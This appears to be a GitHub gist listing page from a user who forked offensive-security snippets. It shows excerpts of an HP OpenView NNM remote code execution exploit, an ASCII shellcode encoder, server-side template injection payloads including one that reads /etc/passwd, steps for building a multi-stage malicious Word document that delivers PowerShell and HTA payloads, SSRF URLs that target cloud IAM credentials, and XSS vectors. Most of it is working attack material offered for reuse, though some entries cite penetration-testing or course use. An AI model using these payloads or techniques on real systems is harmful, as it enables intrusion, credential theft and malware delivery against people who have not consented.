nani1337 / hp-openview-exploit.py

Created January 24, 2019 14:46 — forked from mgeeky/hp-openview-exploit.py

HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.

	#!/usr/bin/python
	# HP OpenView NNM B.07.50 Remote Code Execution exploit
	# by Mariusz B. / mgeeky, 17'

	import struct
	import socket

	HOST = '192.168.XXX.YYY'
	PORT = 7510

nani1337 / ascii-shellcode-encoder.py

Created January 24, 2019 14:42 — forked from mgeeky/ascii-shellcode-encoder.py

ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.

	#!/usr/bin/python
	#
	# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
	# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
	# utility (as described in: Hacking - The Art of Exploitation).
	#
	# Basically one gives to the program's output a binary encoded shellcode,
	# and it yields on the output it's ASCII encoded form.
	#
	# This payload will at the beginning align the stack by firstly moving

nani1337 / Server-Side-Template-Injection-Payloads.txt

Created January 22, 2019 06:05 — forked from mgeeky/Server-Side-Template-Injection-Payloads.txt

A collection of Client/Server -Side Template Injection payloads to be used in Burp's Intruder. Look for evaluted value: 1868686868 (=36692*50929), remove the first line.

	##### LOOK FOR 1868686868
	<%= 36692 * 50929 %>
	<%= File.open('/etc/passwd').read %>
	${36692*50929}
	18686{xxxxxxxxxx}86868
	${"18686".join("86868")}
	${36692*'50929'}
	${{36692*50929}}
	${{36692*'50929'}}
	{{36692*'50929'}}

nani1337 / muti-stage-1.md

Created January 15, 2019 14:05 — forked from mgeeky/muti-stage-1.md

Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

using OLE event autorun method
removing it's pretext shapes
Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
Leveraging certutil technique to receive Base64 encoded malicious HTA document
Having Base64 encoded Powershell command in that Author property

nani1337 / cloud_metadata.txt

Created September 15, 2018 21:37 — forked from jhaddix/cloud_metadata.txt

Cloud Metadata Dictionary useful for SSRF Testing

	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

nani1337 / waybackrobots.py

Created February 16, 2018 05:38 — forked from mhmdiaa/waybackrobots.py

	import requests
	import re
	import sys
	from multiprocessing.dummy import Pool


	def robots(host):
	r = requests.get(
	'https://web.archive.org/cdx/search/cdx\
	?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)

nani1337 / 666_lines_of_XSS_vectors.html

Created March 23, 2017 09:57 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html

666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L

	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>